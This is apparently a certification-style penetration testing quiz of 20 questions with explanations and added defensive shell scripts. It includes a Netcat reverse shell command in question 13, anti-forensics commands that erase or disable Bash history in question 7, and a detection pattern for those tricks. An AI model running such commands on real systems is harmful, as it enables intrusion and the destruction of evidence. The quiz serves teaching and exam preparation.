Penetration Testing Quiz – 20 Questions to Test Your Skills and Learn

Penetration Testing Quiz

Test and expand your knowledge of penetration testing with these 20 thought-provoking MCQs. Designed for learners of all levels, this set includes answers and in-depth explanations to ensure you not only answer correctly but also understand the ‘why’ behind each solution.

1. Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

A. SQL injection
B. VM escape
C. Buffer overflow
D. Cross-site scripting

Correct Answer – B.

Explanation – SQL injection, cross-site scripting, and buffer overflows (the last usually in the native code of the web server, its modules, or the file parsers behind the application rather than in the application's own managed code) are all commonly encountered when testing web applications. Virtual machine (VM) escape attacks target the hypervisor of a virtualization platform from inside a guest; they are not reachable through a web application's attack surface, so they fall outside what a web application test would normally find or exploit.

2. What specialized type of legal document is often used to protect the confidentiality of data and other information that penetration testers may encounter?

A. An SOW
B. An NDA
C. An MSA
D. A noncompete

Correct Answer – B.

Explanation – A nondisclosure agreement, or NDA, is a legal agreement designed to protect the confidentiality of the client's data and any other information the penetration tester may encounter during the test. An SOW is a statement of work, which defines what will be done during an engagement. An MSA is a master services agreement that sets the overall terms between two organizations, which then use SOWs to describe the actual work. A noncompete is just that: an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.

3. Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

A. ZAP
B. Nessus
C. SonarQube
D. OLLYDBG

Correct Answer – A.

Explanation – The Zed Attack Proxy (ZAP), originally an Open Web Application Security Project (OWASP) project, is an interception proxy: it sits between the browser and the application so the tester can view, modify, and replay requests, which is the core of dynamic testing. Nessus is a network vulnerability scanner, SonarQube is a static (source code) analysis tool, and OllyDbg is a Windows user-mode debugger; none of them proxies HTTP traffic.

4. Matt is part of a penetration testing team and is using a standard toolkit developed by his team. He is executing a password cracking script named password.sh. What language is this script most likely written in?

A. PowerShell
B. Bash
C. Ruby
D. Python

Correct Answer – B.

Explanation – The .sh file extension is the convention for Bash (and other POSIX shell) scripts. PowerShell scripts usually have a .ps1 extension, Ruby scripts use .rb, and Python scripts end with .py. The extension is only a convention, though: on Unix-like systems the interpreter actually used is the one named in the script's first line (the shebang, such as #!/bin/bash), and anyone reviewing a toolkit should check that line rather than trust the file name.

5. Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

A. Record the details in the penetration testing report.
B. Remediate the vulnerability that allowed her to gain access.
C. Report the potential compromise to the client.
D. No further action is necessary because Renee’s scope of work is limited to penetration testing.

Correct Answer – C.

Explanation – When penetration testers discover indicators of an ongoing or past compromise, they should immediately inform management and recommend that the organization activate its cybersecurity incident response process.

6. Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

A. Black box
B. Authenticated
C. Internal view
D. External view

Correct Answer – B.

Explanation – An authenticated, or credentialed, scan provides the most detailed view of the system. Black box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.

7. Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently prevent the commands she enters in a Bash shell from being recorded, which of the following commands should she use?

A. history -c
B. kill -9 $$
C. echo "" > ~/.bash_history
D. ln -sf /dev/null ~/.bash_history

Correct Answer – D.

Explanation – All four commands are used to cover tracks, but only one is permanent. history -c clears the in-memory history of the current session, yet the shell still writes history on exit and nothing changes for future sessions. kill -9 $$ kills the current shell before it can flush its history, which loses that session's commands but does nothing about later ones. Truncating ~/.bash_history removes what has been recorded so far, but every subsequent session appends to the file again. Replacing ~/.bash_history with a symbolic link to /dev/null discards every future write, so the file never contains anything again. (Setting HISTFILE=/dev/null or running unset HISTFILE has the same effect for the current session only.) From the defender's side, a .bash_history that is a symlink to /dev/null, missing, or permanently empty is itself a strong indicator that someone has been covering tracks.
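The defender's view of the same trick, as an added example that is not part of the original quiz: a POSIX shell function (the name history_tamper_check and the list of indicators are this example's own choices) that inspects a home directory for the anti-forensics patterns described above and returns non-zero when it finds one. The demo at the bottom runs it against a constructed temporary home directory, so it works offline.

```shell
#!/bin/sh
# Added example: flag the history-tampering techniques from question 7.
# history_tamper_check HOMEDIR prints each indicator found and returns 1 if any
# was present, 0 if the history setup looks untouched.
history_tamper_check() {
    home="$1"
    hist="$home/.bash_history"
    found=0

    # The technique in answer D: the history file is a symlink into the void.
    if [ -L "$hist" ]; then
        target=$(readlink "$hist")
        if [ "$target" = "/dev/null" ]; then
            echo "ALERT: $hist is a symlink to /dev/null (history is discarded)"
        else
            echo "WARN: $hist is a symlink to $target"
        fi
        found=1
    elif [ ! -e "$hist" ]; then
        # Deleted after the fact, or the account never had a history file.
        echo "WARN: $hist does not exist"
        found=1
    elif [ ! -s "$hist" ]; then
        # Answer C (truncation) leaves an empty file behind.
        echo "WARN: $hist is empty"
        found=1
    fi

    # Variants that never touch the file: disabling history in a startup script.
    for rc in "$home/.bashrc" "$home/.bash_profile" "$home/.profile"; do
        [ -f "$rc" ] || continue
        if grep -Eq '(unset[[:space:]]+HISTFILE|HISTFILE=/dev/null|HISTSIZE=0|HISTFILESIZE=0|set[[:space:]]+\+o[[:space:]]+history)' "$rc"; then
            echo "ALERT: $rc disables Bash history"
            found=1
        fi
    done
    return $found
}

# Demo on a constructed home directory (a temp dir, removed afterwards) that
# has had answer D applied to it.
demo=$(mktemp -d)
ln -sf /dev/null "$demo/.bash_history"
history_tamper_check "$demo" || echo "tampering indicators found in $demo"
rm -rf "$demo"
```

On a suspect host, run it as root over every directory under /home and over /root. It only catches the persistent variants: a session that ran unset HISTFILE interactively leaves nothing on disk, which is why shell history should never be the only record of what an account did.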

8. Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

A. Nmap
B. Nikto
C. Wireshark
D. CeWL

Correct Answer – B.

Explanation – It's very important to know the use and purpose of the various penetration testing tools when taking the PenTest+ exam. Nikto is the best tool to meet Kaiden's needs in this scenario: it is a dedicated web server and web application scanner that checks for dangerous files, outdated server software, and common misconfigurations. Nmap is a port scanner, while Wireshark is a packet analysis tool. The Custom Wordlist Generator (CeWL) spiders websites to harvest keywords for password lists. None of the latter three tools perform web application security testing.

9. Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

A. OSINT
B. HSI
C. Background
D. None of the above

Correct Answer – A.

Explanation – OSINT, or open-source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide useful information about systems, networks, and details that guide the active portion of a penetration test.

10. Which of the following activities constitutes a violation of integrity?

A. Systems were taken offline, resulting in a loss of business income.
B. Sensitive or proprietary information was changed or deleted.
C. Protected information was accessed or exfiltrated.
D. Sensitive personally identifiable information was accessed or exfiltrated.

Correct Answer – B.

Explanation – Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.

11. Ted wants to scan a remote system using Nmap and uses the following command:
nmap 149.89.80.0/24
How many TCP ports will he scan?

A. 256
B. 1,000
C. 1,024
D. 65,535

Correct Answer – B.

Explanation – When no -p option is given, Nmap scans the 1,000 TCP ports that are most commonly open according to its nmap-services frequency table; it does not scan UDP at all unless -sU is specified. The /24 in the target specification means 256 addresses, not 256 ports, and -p- would be needed to scan all 65,535 ports. The 1,024 figure is the size of the well-known port range, another common distractor.
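To make the distractors concrete, here is an added example (not part of the original quiz) that counts how many ports an Nmap -p specification covers and how many addresses a CIDR block covers. The function names nmap_port_count and cidr_host_count are this example's own; the port grammar it implements is the subset of Nmap's that uses plain numbers, ranges, and "-" for all ports.

```shell
#!/bin/sh
# Added example: count how many ports an Nmap -p specification covers, using the
# grammar Nmap accepts for port lists: comma-separated ports and ranges, "-" for
# every port (1-65535), and open-ended ranges such as "-1024" (1-1024) or
# "60000-" (60000-65535). Duplicates count once. Protocol prefixes (T:, U:) and
# service names from nmap-services are deliberately not handled.
nmap_port_count() {
    printf '%s\n' "$1" | awk -F',' '
    {
        for (i = 1; i <= NF; i++) {
            spec = $i
            gsub(/[[:space:]]/, "", spec)
            if (spec == "") continue
            if (spec == "-")                     { lo = 1; hi = 65535 }
            else if (spec ~ /^-[0-9]+$/)         { lo = 1; hi = substr(spec, 2) + 0 }
            else if (spec ~ /^[0-9]+-$/)         { lo = substr(spec, 1, length(spec) - 1) + 0; hi = 65535 }
            else if (spec ~ /^[0-9]+-[0-9]+$/)   { split(spec, r, "-"); lo = r[1] + 0; hi = r[2] + 0 }
            else if (spec ~ /^[0-9]+$/)          { lo = spec + 0; hi = lo }
            else { print "bad port spec: " spec > "/dev/stderr"; bad = 1; exit 2 }
            if (lo > hi || hi > 65535) { print "bad range: " spec > "/dev/stderr"; bad = 1; exit 2 }
            for (p = lo; p <= hi; p++) seen[p] = 1
        }
    }
    END {
        if (bad) exit 2
        n = 0
        for (p in seen) n++
        print n
    }'
}

# Number of addresses covered by a CIDR block, for the other distractor in the
# question (149.89.80.0/24 is 256 hosts, not 256 ports).
cidr_host_count() {
    awk -v prefix="${1#*/}" 'BEGIN { printf "%.0f\n", 2 ^ (32 - prefix) }'
}

# The quiz command has no -p, so Nmap uses its built-in top-1000 TCP list, which
# is not a contiguous range and cannot be written in this grammar. The other
# answer choices correspond to these explicit specifications:
nmap_port_count "-"                 # 65535, equivalent to nmap -p-
nmap_port_count "1-1024"            # 1024, the well-known port range
cidr_host_count "149.89.80.0/24"    # 256, the number of target addresses
```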

12. Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

A. Penetration testing
B. Vulnerability scanning
C. Remediation
D. Threat hunting

Correct Answer – D.

Explanation – Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.

13. Liam executes the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has he done?

A. Started a reverse shell using Netcat
B. Captured traffic on the Ethernet port to the console via Netcat
C. Set up a bind shell using Netcat
D. None of the above

Correct Answer – A.

Explanation – Liam has used Netcat to start a reverse shell: the compromised host initiates an outbound TCP connection to 10.1.10.1 on port 7337 and attaches the standard input and output of /bin/sh to that connection, so whoever is listening there (for example with nc -l -p 7337) receives an interactive shell. It is a reverse shell because the victim connects out to the attacker; a bind shell would instead listen on the compromised host (nc -l -p 7337 -e /bin/sh) and wait for the attacker to connect in. Note that -e only exists in Netcat builds that include it, such as nc.traditional or Nmap's ncat; the OpenBSD netcat shipped by many distributions omits it, which is why attackers often fall back to a named-pipe construction or Bash's /dev/tcp instead.

14. Dan is attempting to use VLAN hopping to send traffic to VLANs other than the one he is on. What technique does the following diagram show?

Diagram: VLAN hopping attack

A. A double jump
B. A powerhop
C. Double tagging
D. VLAN squeezing

Correct Answer – C.

Explanation – This is a double tagging attack against 802.1Q trunks. The attacker sends a frame carrying two VLAN tags: the outer tag matches the native VLAN of the trunk, and the inner tag names the VLAN the attacker wants to reach. The first switch strips the outer (native VLAN) tag and forwards the frame across the trunk without adding a new one, so the next switch reads the inner tag as the frame's VLAN and delivers it to the target VLAN. The attack is one-way (replies do not come back to the attacker) and only works when the attacker's access port sits in the trunk's native VLAN, which is why the usual mitigation is to set the native VLAN to an unused VLAN ID and tag native VLAN traffic. Double jumps may help video gamers, but the other two answers were made up for this question.

15. Alaina wants to conduct a man-in-the-middle attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

A. ARP spoofing
B. IP proofing
C. DHCP pirating
D. Spoofmastering

Correct Answer – A.

Explanation – ARP spoofing (also called ARP cache poisoning) sends forged ARP replies, either in response to a victim's request or as unsolicited gratuitous ARP, that map the trusted server's IP address to the attacker's MAC address. Because ARP has no authentication, hosts accept the forged mapping and update their caches, after which traffic addressed to the trusted server's IP is delivered to the attacker, who can forward it on and act as a man in the middle. The other three answers are made-up terms.

16. Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

A. Authority
B. Scarcity
C. Likeness
D. Social proof

Correct Answer – D.

Explanation – Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.

17. Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on site via the network?

A. Shoulder surfing
B. Kerberoasting
C. USB key drop
D. Quid pro quo

Correct Answer – C.

Explanation – A USB key drop is a baiting attack: USB drives loaded with files that look tempting but actually carry the tester's payload are left where employees are likely to find them, such as a car park, lobby, or break room. When an employee plugs one into a workstation and opens a file, the payload installs a Trojan or remote access tool, giving the tester a foothold on an internal workstation without ever entering the building or reaching it over the network.

18. Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?
-rwsr-xr-- 1 root kismet 653905 Nov 4 2016 /usr/bin/kismet_capture

A. An encrypted file
B. A hashed file
C. A SUID file
D. A SIP file

Correct Answer – C.

Explanation – The s in the owner execute position of the mode string (-rwsr-xr--) is the setuid (SUID) bit: when the file is executed, the process runs with the effective user ID of the file's owner, here root, regardless of who ran it. An s in the group execute position would instead be the setgid bit, and a capital S would mean the bit is set without the corresponding execute permission. Setuid root binaries are a standard place to look for privilege escalation, because any flaw in them executes as root.
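As an added example that is not part of the original quiz, the following POSIX shell function (mode_special_bits is this example's own name) decodes the special permission bits from an ls -l mode string like the one in the question, distinguishing setuid, setgid, and sticky, and the capital-letter forms where the execute bit is missing. The find(1) invocation in the trailing comment is how the same search is done across a live filesystem.

```shell
#!/bin/sh
# Added example: decode the special permission bits from an ls -l mode string such
# as the one in question 18. mode_special_bits MODE prints the bits found
# (setuid, setgid, sticky) separated by spaces, or an empty line if none are set.
# A capital S or T means the special bit is set without the matching execute bit,
# which is reported separately because it is almost always a mistake.
mode_special_bits() {
    mode="$1"
    [ "${#mode}" -ge 10 ] || { echo "bad mode string: $mode" >&2; return 2; }
    # Character positions: 1 = file type, 2-4 = owner, 5-7 = group, 8-10 = other.
    u=$(printf '%s' "$mode" | cut -c4)    # owner execute slot: x, -, s or S
    g=$(printf '%s' "$mode" | cut -c7)    # group execute slot: x, -, s or S
    o=$(printf '%s' "$mode" | cut -c10)   # other execute slot: x, -, t or T
    out=""
    case "$u" in
        s) out="$out setuid" ;;
        S) out="$out setuid(no-exec)" ;;
    esac
    case "$g" in
        s) out="$out setgid" ;;
        S) out="$out setgid(no-exec)" ;;
    esac
    case "$o" in
        t) out="$out sticky" ;;
        T) out="$out sticky(no-exec)" ;;
    esac
    printf '%s\n' "${out# }"
}

# The file from the question: the owner execute slot is s, so it runs as root.
mode_special_bits '-rwsr-xr--'    # setuid

# On a live system, the equivalent sweep for setuid/setgid files is a find(1)
# call; -xdev keeps it on one filesystem, and "-perm -4000" matches the setuid
# bit regardless of the other mode bits:
#   find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} + 2>/dev/null
```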

19. Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

A. Nmap
B. Traceroute
C. regmon
D. Whois

Correct Answer – D.

Explanation – Regional Internet registries like ARIN are best queried either via their websites or using tools like Whois; the same registration data is also exposed over RDAP, the JSON-over-HTTPS successor to the WHOIS protocol. Nmap is a port scanning utility, traceroute is used for testing the path packets take to a remote system, and regmon is an outdated Windows Registry monitoring tool that has been supplanted by Process Monitor.

20. Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether the system is a VM or not?

A. Run systemd-detect-virt
B. Run ls -l /dev/disk/by-id
C. Run wmic baseboard get manufacturer,product
D. Run dmidecode to retrieve hardware information

Correct Answer – C.

Explanation – All of these are useful ways to determine whether a system is virtualized, but wmic is a Windows tool (and a deprecated one) that will not exist on a Linux host. systemd-detect-virt reports the hypervisor or container technology directly, dmidecode (and the same data under /sys/class/dmi/id, readable without root) shows the vendor and product strings the firmware reports, and the device names under /dev/disk/by-id reveal virtual disk models such as VMware or VBOX drives.
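The three Linux checks above combined into one function, as an added example that is not part of the original quiz. The name vm_hints and the list of vendor strings it matches are this example's own choices; the paths default to the live system but can be overridden so the function can be exercised against constructed directories, which is what the test does.

```shell
#!/bin/sh
# Added example: the Linux-side checks from question 20 in one function.
# vm_hints [DMI_DIR] [BY_ID_DIR] [CPUINFO] prints each hypervisor indicator found
# and returns 0 if there was at least one, 1 if none. The paths default to the
# live system; passing them explicitly lets the function be tested against
# constructed directories. Reading /sys/class/dmi/id needs no root, unlike
# dmidecode, which reads the same SMBIOS tables from /dev/mem.
vm_hints() {
    dmi="${1:-/sys/class/dmi/id}"
    byid="${2:-/dev/disk/by-id}"
    cpuinfo="${3:-/proc/cpuinfo}"
    hits=0
    # Vendor/product strings common hypervisors put in SMBIOS and disk IDs.
    pattern='VMware|VirtualBox|VBOX|QEMU|KVM|Xen|Virtual Machine|Hyper-V|Parallels|Bochs|innotek|OpenStack|Amazon EC2|Google Compute Engine'

    # What "dmidecode -t system" and "-t baseboard" would show, via sysfs.
    for f in sys_vendor product_name board_vendor bios_vendor chassis_vendor; do
        [ -r "$dmi/$f" ] || continue
        v=$(cat "$dmi/$f" 2>/dev/null)
        if printf '%s' "$v" | grep -Eqi "$pattern"; then
            echo "dmi: $f = $v"
            hits=$((hits + 1))
        fi
    done

    # "ls -l /dev/disk/by-id": virtual disks carry the hypervisor's model name.
    if [ -d "$byid" ]; then
        for d in "$byid"/*; do
            [ -e "$d" ] || continue
            n=$(basename "$d")
            if printf '%s' "$n" | grep -Eqi "$pattern"; then
                echo "disk: $n"
                hits=$((hits + 1))
            fi
        done
    fi

    # The CPUID "hypervisor" feature flag is exposed by nearly all x86 hypervisors.
    if [ -r "$cpuinfo" ] && grep -Eq '^flags[[:space:]]*:.*[[:space:]]hypervisor([[:space:]]|$)' "$cpuinfo"; then
        echo "cpu: hypervisor flag set"
        hits=$((hits + 1))
    fi

    # On the live system, also ask systemd-detect-virt when it exists
    # (it prints "none" and exits non-zero on bare metal).
    if [ $# -eq 0 ] && command -v systemd-detect-virt >/dev/null 2>&1; then
        v=$(systemd-detect-virt 2>/dev/null || true)
        if [ -n "$v" ] && [ "$v" != "none" ]; then
            echo "systemd-detect-virt: $v"
            hits=$((hits + 1))
        fi
    fi

    [ "$hits" -gt 0 ]
}

# Run against the live system.
vm_hints || echo "no hypervisor indicators found"
```

None of these indicators is conclusive on its own: a hardened guest may present scrubbed SMBIOS strings and generic disk names, and a container may show the host's hardware. Treat several agreeing hints as a strong signal, not any single one.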
